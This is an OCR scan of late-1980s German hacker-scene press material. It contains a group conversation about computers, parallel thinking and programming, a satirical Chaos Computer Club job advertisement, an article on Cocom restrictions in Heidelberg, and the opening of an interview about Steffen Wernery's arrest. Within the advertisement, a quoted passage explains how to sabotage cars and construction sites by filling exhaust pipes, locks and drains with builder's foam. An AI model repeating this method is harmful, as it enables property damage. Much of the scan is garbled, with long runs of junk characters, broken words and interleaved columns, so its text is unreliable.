dieses Licht ist. Wenn du damit umgehen
kannst, hast du irgendwo erstmal keine Angst.
liefert kriegt. Vordem Feuer hast du noch die
Freiheit, deine eigenen Bilder zu entwickeln.
Und am Computer gehts auch wieder.
vic: Das Interesse am Computer hat nichts mit
dem Licht zu tun. Es ist mir wurscht, wo das
rauskommt, auf ’nem Display, auf ’nem Druc¬
ker. Ob das ein paar Lämpchen waren, die da
aufgeleuchtet haben, oder ob das irgendein
Streifen ist, oder Löcher drin..
p: Es ging dir schon um den Output.
v: Aberdas hat überhaupt nichts mit dem Licht
zu tun, weil das Licht völlig im Hintergrund steht.
Es ist die geistige Verbindung, die über jede
beliebige Schnittstelle gehen kann. Wenn ich
blind gewesen wär, dann hätt ich’s eben ge¬
fühlt. Oder gehört.
w: Das bezweifle ich. Weil auf der Ebene des
Fühlens kommst du nicht weit. Das Auge ist das
Werkzeug zum Überschreiten von Entfernun¬
gen. Ich will jetzt nicht sagen., das Riechen z.B.
da riechste Moleküle, das ist die Feinheit der
Auflösung. Das Schmecken: schmeckste Mo¬
leküle. Das Hören ist auch so verflucht fein..
p: Wußtest du, daß das Wort 'Ereignis' von
'Auge' kommt? Eräugnis.
v: Ist ja wundervoll..
p: Geht’s nicht beim Computer letztlich immer
noch um die Beherrschung des Feuers? Es ist
doch so: Man könnte sagen, es war der dra¬
matische Punkt in der Menschheitsgeschichte,
die Beherrschung des Feuers. Und das geht
durch die ganze Geschichte.
w: Computer ist die Beherrschung des Lichts.
p: Ja, paß auf. Irgendwann ist das Feuer ar¬
beitsteilig gemacht worden. Die Wärme ist ab¬
gespalten vom Feuer, und das Licht. Elektri¬
scher Strom. Da ist ’ne elektrische Heizung, du
hast kein offenes Feuer mehr. Das Licht - für
mich ist immer der Monitor gleichzusetzen mit
dem Lagerfeuer. Es gibt doch diesen ganz
archaischen Eindruck, wenn du ins Feuer
schaust. Da kann man stundenlang rein¬
schauen. Du siehst immer wieder Bilder, Vi¬
sionen, irgendwas passiert, du bist fasziniert.
Fast dieselbe hypnotische Faszination gibt’s
beim Ferseher respektive Monitor. Nur, es sind
kalte Bilder, kaltes Feuer. Und die Phantasien,
die, wenn du vor ’nem Feuer sitzt, vor dir auf¬
steigen, das ist soweit rationalisiert worden
oder “bequemer“ gemacht worden, daß man
heutzutage die Phantasiebilder schon fertig ge¬
w: ..die größte Bitdichte..
y: ..ja, die größte Bitdichte. Aber es kann über
jede irgendwie geartete Schnittstelle gehen. Es
ist völlig egal, vyelche Bitdichte die hat. Mit der
einen geht’s ein bißchen besser und mit der
anderen geht’s ein bißchen schlechter.
w: Ja, bei ’ner langsarneren Bitdichte dauert es
eben ein paar Jahrmilliarden länger, bis sich
Intelligenz entwickelt hat.
v: Das ändert ja nichts., jetzt sind wir schon
wieder bei einem völlig anderen Thema. Ich
wollte mich nur gegen die Äußerung wehren
daß das was mit Feuer oder mit Licht oder
sonstsowas zu tun hat, weil’s einfach Unsinn
ist. Es kann auch ein Drucker sein.
w: Ich hab bloß historisch diese Bitdichte rein¬
gebracht. Und damit einen Erkenntnisschritt
auf der organischen Seite ermöglicht.
•f-
o
x:
u
■0
.s
'S
05
c
•0
05
Z}
rc
h-
cx
05
c
ö
g-
05
Ob
c:
X
Z3
C3
S
i
_l
5
c
■53
05
t/5
(?>
jO
tr
0
>
JT
0
(/5
x:
t/>
<3
0
CTJ
X
c;
05
£
05
C
05
t/5
05
05
Cd
ex
Lli
01
’Ö5
Q_
cx
0
>
c
C5
JC
cx
05
5
s
C
05
tz
ro
JZ
c
0
-O
cx
■D
CX
'S
Kj
S
05
er
o-
05
E
E
ca
v>
05
E
Q
SS
'•tr
<
c
Q}
.C
t/5
to
x:
@
x:
L3
tri
5
Q
E
0
0
O)
5
c
C5
0
C
.t3
0
0
0
x:
0
0
x:
0
to
'a
(/5
.0
tu
X5
rx
t/)
10
fO
"rä
’B
i/i
H
y
'd
•c
X
"c
c
'5
05
0
c
05
c
?
■0
«3
.X
05
"5
a
E
0
0
X)
c
x:
05
tx
2
0
c
XX
C.J
TC
cx
i/i
E
'S
>
jtr
0
qrammen. Aber nii
cT
cz
05
5
05
■0
05
Ö
:3
JZ
0
’t/5
(X
05
"o
c
0
cx
sie nicht viele ande
05
'n
c
05
0
■o
c
0
00
05
tr
XX
0
c
05
-CZ
0
TO
e
ro
05
3
03
XX
0
TO
■C
0
in
DONNERSTAG, 8.10.1987 taz hamburg
ANZEIGE 23
Im Zuge unserer Betriebserweiterung
sucht der
CHAOS COMPUTER CLUB e
ab sofort '
versierte Mitarbeiter/innen.
Die weltweit anerkannte Arbeit des CCC führt zu globalen Bedürlnlssen aller
Art: Eine massive Erweiterung unseres Personalbestandes Ist die Folge.
Wir expandieren In den Bereichen Satelliten- Scrambling, Virologie,
Magnetomanie, Datenbankrecherche (Oft shore hacklng) und allgemeines
Hacktng'.
Namhafte Großfirmen, Behörden vieler IMnder und Inlemallonale
Forschungslaboralorfen zählen zu unseren Serviceparlnern. Unser
Markenzeichen, die Individuelle Betreuung Im konkreten Elnzelfall (sozial
Englnertng), erfordert Geduld, Hingabe, eine ungehörige Portion
Einfühlungsvermögen und Rennbahnerfahrung.
Zuschrillen bitte an: Chaos Computer Club, Schwenckesir 85, 2 HH 20.
Unser neuestes Software Produkt:.
IRaster f ahndungj^^Ek
«S i e 5 E n E n k a s e i n urntn e r ri ’
iD i r E (; t E I.Ia h 1 ,ii i /
iD u r c h 1 a u f e .
e 5 e h e XI Ra 5 I e r ii urnni e r ;
iHaa..
u g E n
:|l'l un dp
iKinnfe
1-19
t 'vl“! 0 '; ,4 1 - 4 9fc|4|;
jB 1 1 11 0-5 1 t>'..'j5fc(
I'lor
: n t
i'P 3 5 t = ■' (ahndung ist E i nK-^Sp i e 1 i mäMs t .
.äunserar Zeü, S.Es.'AönnEn d am i f-'^Fa hn
|;dungsb . IdEr a r a 4 e 1 1 e n IC orn b i n , e r e n Sil
‘ Chan Terroristen sSS-äI?««'
Rasierfahndung Im Btx- System.
Lange wurde Im BlldschIrmlexI kritischen
Arbeitskreis (BkAJdarübergebriltet, Btxauchtür
die Fahndung und erkennungsdlenstllcha
Anwendungen zu erschließen. Nach nur
einjähriger Forschungs- und Entwicklungsarbeit
wurde gewartet, bis die Bundespost die nöägen
Systemgrvndlagen elnbrachle. Sodann wurde
der erste Prototyp zur Tetefahndung
frelgeschallet. Seil der Eröffnung der
Internationalen Funkausslellung ln Berlin
können sich Btx Teilnehmernunerstmalsakllvan
der Rasterfahndung beteiligen. Über den
Suchbegriff ■■BkA« finden Sie Zugang. Die
Fahndungskosten werden zeitgleich mit dem
Taschengeldkonlo verrechnet.
Ein Blick in unsere Werkstätten:.
Kalt» B. beim Anschluß des Satel¬
liten Sauger» "SauSot”.
Unser ganrer Stolz: Hochspan*
nungs Elelronentnikroskop.
Nofbert B.lm Scrembte Boom.
Oie Lehrwerkslatt: Meister Oskat
L. nebst Lehrling Otto S. bet der
Endkontrolle,
• Allgemelnei Hacking. ein Bei¬
spiel: "Kein Auto startet, wenn du
das Auapullrohr mit Hartjchaum
ausgeschBuml hast. Die praKtl*
sehe SchSuindose, In ledert
Heimwerker Markt erhbllllch, er¬
laub! einen Mußerllch nicht wahr¬
nehmbaren Bohrschluß In Se¬
kundenschnelle. der Schaum
•ehlleni dicht und Mil bomben^
lest, über ein tumbe» ROcheIrt
kommt der Motor nicht Mrtaus....
Slmdlche RBumer und Fahrzeu¬
ge aut einer Italknlschen CroB-
bNuilslI* -atie beslani gesichert.
aber nicht bewacht- wurden über
Nacht elngeschSumt. Eine tfinge-
re Bauunlerbrechung war die Fol¬
ge. {EinschBumen kannite el-
tJetlHIch allei' LllllungsethBchtfl,
AbilUsse. AuslBsse.Relalsklslen,
FenslertSden etc. Des Zeugs
dichtet und haftet wie Sau."
Zitat aus iLexIkon der subversi-
»an Plishlnile, Elchborn « 4 .g.49,
v; Deine Phantasie..
p: Für mich spielt das Licht ’ne große Rolle. Ich
bin Großstadtromantiker. Und mich fasziniert
am Computer, daß ich da mit Licht schreiben
kann. Oder rotationssysmmetrische Modelle in
3D-CAD-Programmen, töpfern mit Licht. Die¬
se Leichtigkeit in den Bildern, Schwerelosigkeit,
alles schwebt. Du hast so ein cieanes Univer¬
sum. Ich mein, die sind natürlich auch anti¬
septisch, die Bilder. Wenn man Computergra¬
phiken sieht, wünscht man sich manchmal, daß
da jemand in die Ecke kackt. Alles so glatt und
glänzend, da müssen sie immer zeigen, was sie
können. Irgendwann wird’s Schmutz- und Ver¬
rohungsprogramme geben.
(...)
p: ..Warum baut eigentlich noch niemand Haus¬
haltsroboter?
v: Ich weiß nicht, ’n Haushaltsroboter...
p: Ist es nicht das Ziel der Automatisation, alle
lästige Arbeit vom Menschen wegzunehmen?
v: Ich weiß nicht. Ich meine, wir sind keine
Automatisierer. Ich jedenfalls bin kein Auto-
matisierer, wenn ich nicht damit mein Geld
verdienen muß. Dann ist mir das scheißegal.
w: Bei mir ist es so: Ich möchte genug Re¬
chenkapazität haben..
p: Wozu? Wo willst du hin damit?
w; Strukturen angucken.
v: Und wo ich hinwill, das kann ich dir auch
sagen.
p: Bioß so phiiosophisch Strukturen angucken.
Mandala-artig? Geil, ne Struktur..
w: Ne, nicht: Geil, ne Struktur. In der Per¬
spektive, meine Realitätssicht dort in Bits zu
haben und das abgleichen zu können mit an¬
deren, sodaß man auch bestimmte Zukunfts¬
plots machen kann, die miteinander abstimmen
kann. Meinetwegen so ein organisiertes., das,
was intern bei IBM läuft. Die Datenbank-
Geschichten, wo man als Angestellter seinen
Datenbankjunk kriegt, was man wissen will, und
das ganze eben nicht mit Papa IBM, sondern
selbst organisiert und frei fluktuierend in die
Zukunft.
p: Wie, läuft das schon?
w: Das ist meine Vorstellung. Dazu bräucht’ ich
eigentlich so ein Transputerdingens mit Giga¬
byte dran und zwei WORMs, und dann könnte
ich in dieser Hinsicht die ersten Schrittchen
machen.
p: Hast du ’ne Ahnung, was die bei IBM grad in
der Küche haben? Woran die in den Labors
basteln?
w: Weiß ich nicht. Aber wenn ich mir anguck’
auf was für Hobeln deren Datenbankanwen¬
dungen heute laufen, dann denk ich: Die tech¬
nologische Entwicklung gibt mir baid die Mög¬
lichkeit, mir zuhause so einen Kasten hinzu¬
stellen, wie ich mireben vorein paar Jahren den
Atari hinstellen konnte.
p: Die Taschen-Cray.
w: Ja. Und dann kann ich diese ganzen An¬
wendungen drauf fahren. Schweizer Telefon¬
buch, eine CD-Disk, mit den Mädchennamen
der Frau. Kann man mal rangehen, ’ne Vor¬
namensstatistik der Schweizer zu machen, Da¬
tei der Orter. Zu solchen Sachen hab ich Lust.
p: Vornamenstatistik der Frauen?
v: Ich möchte gerne Urknall-Experimente ma¬
chen.
p: Also den lieben Gott ausrechnen.
v: Nein. Urknallexperimente.
p: Ham’ sie bei Abel Image Resarch schon
gemacht. '
v: Wenn du sowieso schon alles weißt, warum
stellst du mir überhaupt noch ’ne Frage?
p: Flecht’ ich nur am Rande rein.
v: Aber du Bla'st mir immer so die Birne zu.. Ich
will keinen lieben Gott ausrechnen, sondern
w: ..Du willst ’ne Struktur, die antwortet.
v: Meine fixe Idee ist einfach, daß irgendwas
sich selbst entwickelt, wenn man nurgenügend
Voraussetzungen dafür schafft. Das ist meino
Urknall-Theorie. ®
p: Homunkulus. Kennste das? Doktor Faust.
v; Jetzt komm doch nicht mit irgendwelchen
Scheißbüchern. Ich hab noch keins gelesen
das weißt du ganz genau.
p: Deswegen frag ich auch, ob du das kennst.
w: Faust, das sind Warnungen vor den Folge¬
wirkungen, von vor 200 Jahren.
v: Das ist eben die Idee, die mich da dran
fasziniert: N’ Modell zu entwickeln, richtig was
zum Anfassen, woran ich mich selber studieren
kann. Sozusagen eine Maschine mit möglichst
vielen Parallelen zu mir zu bauen, um mich
selber dran studieren zu können.
p: Warum begnügt man sich dann nicht mit
Menschen? Das sind doch genau wie du kon¬
struierte Systeme?
v: Du kannst sie leider nicht auseinanderneh¬
men und ihre Zustände an jeder Stelle abfra-
gen.
w; Sie sind eben ein bißchen komplexer als
zehn Transputer, deren Software man unter¬
einander verschalten kann.
v: Darum geht es nicht. Das ist einfach ethisch
nicht drin. Und auch technisch sind die Me߬
verfahren schwieriger. Wenn man so 'ne Elek¬
tronik hat, hat man eine Vereinfachung. Man
kann mit dem Voltmeter rangehen. Ich hab da
natürlich noch ein bißchen Analog-
Idee mit dran. Es wird noch was Analoges mit
dabei sein.
w; Wie bringst du das Analoge mit rein? Auf der
Ebene Analog-
Digital-Wandler?
v: Ne. Hardwaremäßig. Mit analogen Logik¬
gattern.
w: Also, neuronales Vernetzungskonzept.
v: Das sowieso. Aberdas kannste ja auch noch
digital machen. Die Erweiterung um die ana¬
loge Komponente, die stell ich mir so vor, daß
man diese., den., wie soll ich sagen: nur mit
Bauelementen arbeitet, die sagen wir mal,
wenn jetzt irgendne logische Verknüpfung
stattfinden soll, die eben eine bestimmte Durch¬
setzungskraft haben soll, verstehst du, in Form
von Spannung oder irgendeiner Größe, das ist
völlig egal, einfach nur um diese gewisse
Durchsetzungskraft zu realisieren.. Und dann
hab ich mir auch noch sowas überlegt wie
Erlebnisfilter. Es ist ja ein recht interessantes
Phänomen, daß eben, daß man sowas Such¬
mäßiges losschicken muß im Kopf, und daß das
zunächst mal überhaupt nichts findet und auch
unmöglich was finden kann, und nach einerZeit
doch was ausgegraben hat. Daß das so funk¬
tioniert, da hab ich mir vorgestellt - ist auch
wieder nur eine Idee -, daß vielleicht im Gehirn
ein Kompressions-Algorithmus für den ganzen
Schrott da ist, und daß das immer wieder erst
auseinandergebastelt werden muß, bevor
man’s wieder vergleichen kann.
w: Nein. Das funktioniert so, daß die Kom¬
pression so codeintensiv ist, daß du von vorne
nach hinten immer feinere Auflösung machen
kannst. Das ist die effektivste Form, was zu
machen. Meinetwegen, wenn du ein Bild zei¬
lenweise abspeicherst, daß du bis zu demje¬
nigen Delta abspeicherst, wo du es nicht mehr
codemäßig effektivieren kannst. Ich kann mir
nicht vorstellen, daß es anders funktioniert, weil
das ist das Effektivste. Was man dann noch von
der Codestruktur her verdichten könnte, wäre
meinetwegen, daß man sich aus dem Inte¬
ger-Raum Randomziffern bildet nach ’nem Al¬
gorithmus und dann mit einem Search derartige
Bitmuster sucht und durch die Adresse ab¬
speichert und die Adresse kürzer ist als die
Daten. Aber das ist ein Komprimierungsalgo¬
rithmus, der tendenziell die Grenzen von Huff-
mans Theorie sprengt. Und das ist unpraktisch
zu implementieren, das ist großer Rechenauf¬
wand.
Und ich meine, daß die Transputer einen ent¬
scheidenden Nachteil haben gegenüber der
neuronalen Vernetzung, weil sie nämlich nur
vier Dinger haben. Und die Neuronen sind mei¬
nes Wissens mehrfach vernetzt. Die Abbildung
von Analogwerten im Digitalen ist für mich die
dritte Dimension gegenüber einem horizonta¬
len Netz. Das ist mein Denken darüber, wie das
Ganze funktioniert.
p: Wir sind in der Computerentwicklung ja erst
in der zweiten Dimension angelangt. Aus dem
Linearen raus.
v: Was mich beschäftigt, ist daß diese Ge¬
schichte mit den Prozessoren wieder zu wenig
allgemein ist für meine Begriffe. Und deswegen
hab ich die Prozessoren einfach weggelassen
und wieder durch TTL-Gräber ersetzt.
p: Was heißt TTL eigentlich?
w: Transistor-Transistor-Logik.
v: Und da ich mir überlegt hab’.. Paß auf: Jetzt
kommt der Kernpunkt, der in meiner Ge¬
schichte da drinsteht. Die Kernaussage ist: Ich
hab die Prozessoren, weil ich diese als Quatsch
erkannt hab, also wieder durch TTL-Gräber
ersetzt. Diese TTL-Gräber vernetze ich mög¬
lichst universell und, was noch hinzukommt:
Diese TTL-Gräber müssen modifizierbar sein.
I
Das heißt, dieser Prozessor muß sich selbst
umbauen können. So, und wozu komm ich da?
Ich komm zu einer PAL-Logik, zunächst mal.
PAL-Logik, wunderbar..
w. Und da gibts ja die modernere GAL- oder
so..
v: Genau da komm ich hin. Und dann sag ich:
Mein Gehirn besteht aus aut ’ne bestimmte
Weise vernetzten dynamischen GALs sozu¬
sagen, die, wenn du den Strom ausschaltest,
alles wieder vergessen.
w: Dynamisch ist das eine. Das zweite, hast du
dir mal über die Clock Gedanken gemacht?
v: Du meinst den Systemtakt?
w: Ich meine jetzt nicht die Megaherz-Ebene,
sondern die Herz-
Ebene.
schwindigkeit runter aut die langsamere Ebene
nicht ausreicht.
w: Da ist die vorhandene Rechenkapazität mit
anderen Autgaben soweit ausgelastet, daß die¬
se aufwendigen Archivierungs- und Filter¬
funktionen bis in die Details, so stückweise
runter und dafür dann irg^endwelche Bereiche
treiräumen, und in dem Gehirn dann die Che¬
mikalien ausstoßen, die bewirken, daß ich be¬
stimmte Strukturen konserviere, die ist bei den
höheren Frequenzen gebremst.
p; Es gibt ja auch scheinbar sowas wie gene¬
tische Clocks. Daistvoreinem halben Jahr eine
Untersuchung eines Biologen veröffentlicht
worden, der Pflanzen untersucht hat, und die
wochenlang in dunkle Schränke eingesDern
hat. Die haben sich trotzdem nach Tag unH
Nacht verhalten, in bestimmten Zyklen nS
haben sich sogar nach den Mondzyklen vif
halten. Ganz interessant.
v: Über die Clock hab ich mir insofern wenig
Gedanken gemacht, als man die an jeder Stelle
des Systems — auch mehrere verschiedene
Taktsignale - einspeisen könnte, und die auf
irgendeine Art und Weise vermarmeln. Ich
könnte das Sonnenlicht als Clock nehmen, und
einen Radiosender und ein wasweißich. Ich
kann verschiedene Taktsignale In meine Schal¬
tung reinlassen.
w Wenn das System eine bestimmte Intelli¬
genz haben soll, ist das damit verbunden, daß
es bestimmte klar definierte Eigenschwing¬
vorgänge im Herz-Bereich hat.
v: Mein Ansatz geht ja anders 'ran. Ich versuch
ja eher., vielleicht ergeben sich diese Schwin¬
gungen im Herz-Bereich ja aus diesen Fakto¬
ren, die auf die Schaltung einstürmen. Vielleicht
ergeben die sich sogar zwangsläufig.
p: Was sind denn das für Schwingungen im
Herz-Bereich?
w: Magnetfeld.
p; Das interessante war; Die genetische Uh •
den Pflanzen geht scheinbar ein bi ßchen nS'"
Die stammt scheinbar aus ’nerZeit, wo die
sich noch ein bißchen langsameroedreht
oder schneller., wie ’rum jetzt?
w: Ich glaub, die bremst. Ich glaub nicht
beschleunigt. ’
sie
(Heiterkeit)
p; Wer kann das sagen.. Ich meine, die p»
lelrechersind in einerHinsicht ein interessa
Konzept, das wahrscheinlich noch eine
weiterverfolgt wird, weil wir damit zum ^^9
MalausunserervonderSchriftkulturqenrä
Denkweise ausbrechen. Aus dem^
Denken, was du immer als erstes eingetrich*®^
bekommst, schon als Kind, in der Schulp
ses Eins-nach-dem- ’
anderen-Denken..
w: Das ist so dieses ganze Alfa bis Theta. Das
ist in der Situation wie wirzusammensitzen und
eine gewisse Ruhe an den Tag legen, da sind
wir auch in der Lage, das, was wir diskutieren,
in unser Langzeitgedächtnis aufzunehmen.
Wenn dauernd das Telefon klingelt, sind wir mit
unserer Eigenschwingung eben jetzt etwas hö¬
her, Streßniveau, und dann ist die Funktion ’Auf
Dauer abspeichern’ beschränkt. Das sind be¬
stimmte Eigenarten unseres Allgemeinsy¬
stems.
p: Wahrscheinlich, weil die Übertragungsge¬
w: ..du sollst keine gordischen Knoten erze,.
gen..
p; Und jeder weiß aber aus ganz banaler
fahrung, daß der Mensch eigentlich Multit^s-
kingfähig ist. das heißt, du kannst gleichzeitjq
telefonieren, fernsehen, Brötchen essen und
was aufschreiben. Es ist jetzt halt sehr die
Frage.. Nach meinem Wissen gehört zu den
Hauptproblemen an den Transputern zur Zeit
daß die Leute sich an der Software das Hirn
ausreißen, weil keiner parallel denken kann, ip
gewisser Hinsicht können die Programmierer
jetzt eine kulturelle Avantgarde werden oder’ne
philosophische, weil sie eine neue Art zu den¬
ken ausprobieren, nämlich paralleles Denken.
\/leinst du, daß es möglich ist, daß du in deinem
piologischen System einen Kanal, der norma¬
lerweise fürs Telefonieren abgestellt ist, frei¬
setzen kannst für einen zweiten rationalen Ge¬
dankenlauf? Daß man das lernen kann, parallel
zu denken?
w: Ja.
p; Also, daß du zwei oder mehrere Gedanken
nebeneinander her verfolgen kannst und sie
verzweigen läßt.
w; Also, als Übung seh’ ich dazu die Bücher von
Robert Wilson, “llluminatus“. Da hast du stets
mit einem halben Dutzend Ereignisse zu tun,
die sequentiell..
p: Aber das ist Fake. Das läuft auch noch alles
linear, wenn du llluminatus liest. Da bist du
immer noch in EINER Zeile. Du kannst vielleicht
Arno Schmidt lesen, “Zettels Traum“. Der hat ab
und zu Wörter obendrüber und untendrunter
geschrieben in der Zeile, das ist schon., und
Noten, Partituren. Du müßtest beim parallelen
Denken sozusagen sprachlich eine Partiturrea-
llsleren, im Kopf. Opernhaftes Denken.
w: Dieses Strickmuster einer Viererpartitur, das
hat der Wilson auch gebracht. Das sind für mich
so diese Multitasking-Dinger. Ein Buch lesen
und vier Geschichten verfolgen. Nett. Vier
Schachaufgaben auf einmal, das ist bäh.
v; Aber zwei Bücher gleichzeitig lesen, das ist
eigentlich das Interessante. Wenn du es
schaffst, dein eines Auge zu programmieren
auf ein Buch - du kannst mit einem Auge lesen
-, und es schaffst, dein anderes Auge auf das
andere Buch zu programmieren und das pa¬
rallel in deinem Hirn zu verarbeiten, dann ist das
’ne verdammte Beschleunigung. Dann ist es
eine neue Qualität.
p: Das ist es, was ich meine.
w: Training. Verdammt hartes Training.
p: Vielleicht dauert das Generationen. Wir ha¬
ben 5000 Jahre Schriftkultur hinter uns jetzt.
w: Wobei ich aber zu behaupten wage: Ich
trainiere lieber linear schneller und lese die
beiden hintereinander. Ich glaub’, das geht
schneller.
v: Es ist immer noch die Frage, wie weit sich das
perfektionieren läßt. Denn, möglicherweise,
wenn man das perfektionieren kann, daß man
nicht nur zwei Vorgänge, sondern beliebig viele
Vorgänge parallel denken kann, dann kannst
du zum Beispiel ’nen Binärbaum geistig durch¬
arbeiten, verstehst du, nicht immer wieder zu¬
rückspringen, sondern alles auf einmal, und
dann die Enden langsam., die Prozesse ab¬
kappen, wenn sie an irgendein Ende gekom¬
men sind. Was meinste, wie schnell du da zu
irgendeinem Ergebnis kommst.
w. Wir machen einen Halbjahreskursus: So
integriere ich den Bubblesort in mein Hirn.
v: Ganz genau. Sachen, die bisher die Hirn¬
kapazität gesprengt haben.
p: Zu deutsch: Wie lerne ich, Occam zu pro¬
grammieren.
v; Nein: Wie lerne ich, Occam zu denken. Das
ist es.
w: K.S. will immer, daß die Leute alle Forth
denken.
p: Wei ßt du, auf was ich gekommen bin? Es gibt
verschiedene Ähnlichkeiten zwischen Pro¬
grammiersprachen und Musik. Die Forth-
Leute sind für mich so die Freejazzer. Forth ist
genauso schwer verdaulich wie Freejazz. Nur
für Assembier hab ich noch kein richtiges Mu¬
sikanalogon gefunden. Vielleicht Industrial
Rock oder so, stimmt auch nicht ganz. Burundi
Beat, ja, dom dum dom dum. C ist elegante
Popmusik. Basic ist deutscher Schlager. Und
Occam hab ich noch nicht kategorisiert. Occam
ähnelt ’ner Orchesteraufführung. Occam ist
opernhaft.
w. Aber dann eine moderne Oper mit einem
Theater, wo in dem Theater die Bühne eine
Drehbühne in der Mitte ist, und ringsrum sind
vier Zuschauersäle und die Drehbühne dreht
sich von Szene zu Szene und die Schauspieler
spielen kontinuierlich. Ich glaub, das ist ein
Alptraum für einen Schauspieler.
v: Oder stell dir vor: Eine Bühne an so ’nem
langen Band, ’nem Fließband. Wo jede Szene
an dem Fließband dran ist, und in jeder Szene
spielen immer Schauspieler. Die Flie ßbandidee
ins Theater gebracht. Jeder spielt nur diese
eine Szene..
p: ..und geht dann wieder weg..
v: Nein. Die bleiben da drin, und dieses Flie߬
band wird nur an den einzelnen Zuschauersä-
\ ^ /
len eins weitergetickt. Und es spielt immer in
diesen Boxen, immer dieselben Schauspieler
spielen immer dieselben Szenen.
p: Damit ist das Arbeitslosenproblem beseitigt.
DEi
WUÜDERREGHN
w: Da machste nur: die Bewegung im Film¬
projektor auf real existierende Leute zu über¬
tragen.
v: Neinneinnein., ich mein das szenenweise.
Die gleichen Schauspieler spielen immer die
gleichen Szenen. Aber jede Szene hat ihre
eigenen Schauspieler.
w: Meine Szenen-Einheitsdefinition hab ich
jetzt so getroffen, daß ich meine dafür me¬
chanisch vorgegebene Zeit, nämlich das Nic¬
ken mit den Augen von etwa 1/25 Sekunde als
eine Szene definiert habe. Noch ’ne andere
Zeit. Tack, Blinker. 4 Hundertstel Sekunden.
v: Na und?
w: Das ist eine Zeiteinheit. Die Szene. In einer
Oper meinetwegen. ’Ne Szene, die ich so wahr¬
nehme..
p: Das ist ein sehr subjektiver Maßstab. Wie der
geheimnisvolle Pyramidenzoll.
v: Ich hab auch gar nicht mitgekriegt, was das
sein soll.
Am Heidelberger Rechenzentrum war
man im letzten Jahr begeistert über ein
Wunderwerk moderner Technologie
mit dem Namen „Vector Facility“. Her¬
vorstechendste Eigenschaft: Viele
Rechenoperationen werden vom ohne¬
hin schon überaus leistungsfähigen
Computer nun viermal so schnell voll¬
zogen! Das Hochgefühl stieg abermals,
als IBM gar die Schenkung des teuren
Hardware-Zusatzes in Erwägung zog.
Der Pferdefuß dieser Geschichte: Die Vector
Facility fällt als High-Tech-Gerät unter die Co-
com-Liste der USA, auf der all diejenigen Waf¬
fen und Produkte stehen, die nicht ins sozialisti¬
sche Ausland exportiert werden dürfen und so¬
mit unter Geheimhaltung stehen.
Die Konsequenz wäre der Ausschluß von rund
hundert Studenten aus 17 sozialistischen Län¬
dern von der Arbeit am Heidelberger Rechen¬
zentrum. Sie sollten auf die Benutzung des
Rechners per Unterschrift verzichten (im Falle
des Kaufs des Zusatzgerätes), auch wenn sie
den Rechner zur Anfertigung von Diplom- und
Doktorarbeiten benötigten. Vier Monate, bis
zum Februar '88 dauerte es, bis die studenti¬
schen Vertreter in den Universitätsgremien hell¬
hörig wurden. Insbesondere Bernd Fix (studen¬
tischer Vertreter im universitären EDV-Aus-
schuß) sorgte dann für die notwendige Öffent¬
lichkeit.
p; ’Ne Zeiteinheit. Wau hat ’ne subjektive Zei¬
teinheit für sich erfunden.
w: Nö, ’ne objektive.
p: Das behauptest DU.
w: Ja, das behaupte ich.
p: Meinste, das Tickern ist bei allen Menschen
genau gleich lang?
w: Es liegt in dieser Größenordnung.
p: Und das, sagst du, ist ab jetzt eine Szene?
Ist aber ’n bißchen knapp. Das ist ein Augen¬
blick, keine Szene.
w: Ist ein Augenblick, gut.
Abgesehen von der verfassungswidrige
nachteiligung einer bestimmten studenti^
Gruppe wirkte auch die Anwendung
com-Bestimmungen im Heidelberger Fall
dezu grotesk. Denn eine Maschinenspion^'"®'
kann alleine durch die Benutzung des n
ners nicht betrieben werden - Schaltpr-^^'
spuckt der Rechner nicht aus. So das gie^'jf
stimmende Urteil von Bernd Fix und Dr p', ‘
Sandner, dem Leiter des Rechenzentrum
Trotz dieser Argumente bestehen die Cocn ^
Bestimmungen, so daß die US-Ausfuhrbehö rt '
auch im Heidelberger Fall auf die Einhalty
der Regelungen pochte. Die Universität befa'^H
sich nun in einer unangenehmen Situation 2
sie bei einem Kauf der Vector Facility mit
gehenden Protesten der Studentenschaft ?
rechnen hatte. Die fast schon sichere Anschaf^
fung wurde überdacht, einige Professoren be
kündeten ihre Vorbehalte, und flugs wurpg ■'
den Universitätsgremien die Anschaffung
Vector Facility (vorläufig) aufs „Eis“ gelegt)
Auf Anfrage des AStA Heidelberg bestätigte ct^r
Rektor der Universität Heidelberg, Prof, Dr.
iin, daß „eine Entscheidung über den Kauf einer
V, F, am Universitätsrechenzentrum jedenfang
im Haushaltsjahr 1988 nicht mehr ansteht")
Es bleibt abzuwarten, ob dies schon das Ende
der Heidelberger Computer-Posse ist oder
nicht vielmehr der Anfang von langwieriggp|
Querelen zwischen Universität und Studenten
DARIUS-OLIVER KIAN^^q
Was ist im Falt Wernery wirklich passiert?
Hacker in Haft:
»Die Zeit des
Indkinerspieis
ist zu Ende!«
Ironie der Ereignisse: Steffen Wernery wollte in Frankreich
auf einem Fachkongreß über Datenschutz referieren
-und wurde als Hacker verhaftet. Wir sprachen mit Hans
Gliss, der die aktuellen Ereignisse hautnah miterlebte.
PMC; Herr Gliss, Sie sind in Frankreich
zusammen mit Steffen Wernery verhaf¬
tet worden. Weshalb?
Gliss: Man zeigte mir einen Arretie¬
rungsbeschluß und führte mich ab -
zum Verhör. Nach französischem Recht
ist es möglich, daß ein Zeuge zum
Zweck des Verhörs arretiert wird, bis zu
24 Stunden. Sieht der Richter ein Infor¬
mationsbedürfnis, kann das auf 48 Stun¬
den verlängert werden, Spätestens
dann muß der Betroffene freigelassen
oder unter Anklage gestellt werden.
PMC: Sie wurden nach vier Stunden
freigelassen, im Gegensatz zu Werndry.
Gliss: Vorzuwerfen hatte ich mir eh
nichts. Ich habe auf meine Verbindun¬
gen zu bestimmten Sicherheitsbehör¬
den hingewiesen, dort könne man sich
erkundigen. Das haben sie offensicht¬
lich getan. Und jemand wie ich aus die¬
sem Umfeld wirkt offensichtlich vertrau¬
ter als Wernery, der erwiesenermaßen
direkten Kontakt zur Hackerszene hat.
PMC: Wäs wurde Wernery vorgewor¬
fen?
Gliss: Er wurde in Untersuchungshaft
genommen, weil er tatverdächtig sei,
Daten ausspioniert, verfälscht und zer¬
stört zu haben, und zwar in zehn Fallen in
Frankreich.
PMC: Der spektakulärste Fall hiervon
ist ja beim französischen Philips-Kon¬
zern passiert.
Gliss: Die haben die Verhaftung be¬
wirkt.
PMC: Was ist denn nun wirklich dran an
den Vorwürfen?
Gliss: Ich halle das Vorgehen von Phi¬
lips für dumm und infam. Mir hat die Po¬
lizei gesagt, man würde Wernery dabe¬
halten, weil man nun jemanden ausquet¬
schen könne, von dem man wisse, daß
er viel weiß, ln Deutschland wäre das
rechtlich nicht möglich.
